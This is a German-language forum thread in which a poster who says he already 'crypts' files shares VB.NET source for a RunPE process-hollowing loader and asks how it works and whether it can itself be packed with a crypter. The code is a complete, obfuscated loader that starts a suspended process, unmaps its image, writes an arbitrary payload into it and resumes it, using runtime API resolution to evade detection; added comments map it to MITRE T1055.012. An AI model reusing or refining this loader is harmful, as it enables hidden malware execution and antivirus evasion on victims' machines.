


    OK, ich denke, dass es jetzt klappen wird.


    Habe mit Crypten schon Erfahrung, läuft auch so weit gut.


    Aber wenn ich mir den RunPE-Code anschaue, verstehe ich da nichts.

    Habe mir schon einige Sachen über Process Hollowing angeschaut, dabei habe ich wenig gefunden, was mir etwas beibringen konnte.

    Würde gerne verstehen, was die einzelnen Funktionen im RunPE-Code bedeuten und wie man ihn selber schreiben kann.

    am besten über pm

    hier der code

    Imports System.Runtime.InteropServices
    Imports System.Text
    
    '''' <summary>
    '''' Coder : Rahoz
    '''' RunPE Coder : Simon-Binyo
    '''' Call : ( byte() , String )
    '''' Purpose : Execute App In Memory from byte array
    '''' </summary>
    
    Public Class gFDLGDFASKL
        ' Process-hollowing ("RunPE") loader as posted. Defender's reading of the
        ' sequence visible in this class: resolve ntdll/kernel32 exports by name at
        ' runtime (LoadLibraryA + GetProcAddress), create a child process with
        ' creation flag 4 (CREATE_SUSPENDED), NtUnmapViewOfSection on the child's
        ' image, VirtualAllocEx + NtWriteVirtualMemory of the caller-supplied
        ' buffer, NtGetContextThread / NtSetContextThread on the primary thread,
        ' then NtResumeThread. That exact API chain against a freshly created
        ' suspended process is a well-known detection signature (MITRE ATT&CK
        ' T1055.012); the randomised identifiers and the dynamic export resolution
        ' are evasion indicators and add nothing functionally.
        Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
        Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
        ' Resolves export KAvK of module eXcI at runtime and returns it as a
        ' delegate of type T, so none of the native names below appear in the
        ' binary's import table.
        Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
        End Function
        ' Delegate signatures for the dynamically resolved native calls; the
        ' delegate names carry no meaning, the target export is given at the
        ' call site via BUeBsTZDkKEMbrG.
        Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
        Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
        Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
        Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
        ' CreateProcessW is the one call that is statically imported; its
        ' creation-flags argument is what makes the child start suspended.
        Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Reads zRwHpUb bytes (default 4) at address FsQGol from the *current*
        ' process through NtReadVirtualMemory and returns them as an Integer.
        ' Used by GNMNioZVtaV to pull header fields out of the in-memory image;
        ' the NTSTATUS result and the bytes-read count are never checked.
        Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
            Dim qZYGUEz As IntPtr
            Dim WBiwMxI As Integer
            Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
            Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
            Return qZYGUEz
        End Function
        ' Entry point: RIAkWcIh is the image to run, MRbichBw the command line of
        ' the host process that gets hollowed. Returns True once NtResumeThread
        ' has been called; every exception is swallowed and reported only as
        ' False. No native return value is checked anywhere in the body, and no
        ' cleanup of the child's handles (yYEifvEzt(0), yYEifvEzt(1)) appears
        ' here, so a failure after CreateProcessW leaves an orphaned suspended
        ' process behind -- a useful forensic artefact when triaging a host.
        Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
            Try
                ' The pin is released immediately; the address is kept anyway.
                Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
                Dim EEXsqPyEy As IntPtr = IntPtr.Zero
                Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
                Dim PXYyxEHcm As Byte() = New Byte(67) {}
                Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
                Dim BmSklSftl As Integer
                Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
                EFfDmpqlB(0) = &H10002
                ' Child created suspended (flag 4); process/thread handles land in yYEifvEzt.
                Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
                Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
                BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
                Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
                qfXWO(yYEifvEzt(0), BmSklSftl)
                Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
                Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
                Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
                Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
                Dim bdLBZrKmW As Integer
                Dim rszaetz As Integer
                Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
                api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
                ' Per-section copy loop: each iteration is a further remote write into the child.
                For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                    Dim QcXOrDrbL As Integer() = New Integer(9) {}
                    Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                    Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                    Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                    MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                    AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                    api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
                Next i
                ' Thread context read, patched and written back before the resume.
                Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
                sdfsgt(yYEifvEzt(1), EFfDmpqlB)
                api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
                EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
                Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
                ihsg(yYEifvEzt(1), EFfDmpqlB)
                Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
                ByZcV(yYEifvEzt(1), 0)
            Catch ex As Exception
                ' Catch-all: the failure reason is discarded and the child is not terminated.
                Return False
            End Try
            Return True
        End Function
    End Class
    Ein Moderator muss mir die Nachricht mit dem Code erst freischalten.

    ---------- Post added at 23:56 ---------- Previous post was at 22:05 ----------

    Kann ich eigentlich meinen RunPE-Code mit einem RunPE-Crypter verschlüsseln und ganz normal ausführen?
    Geändert von Barny (30.01.2018 um 10:30 Uhr)
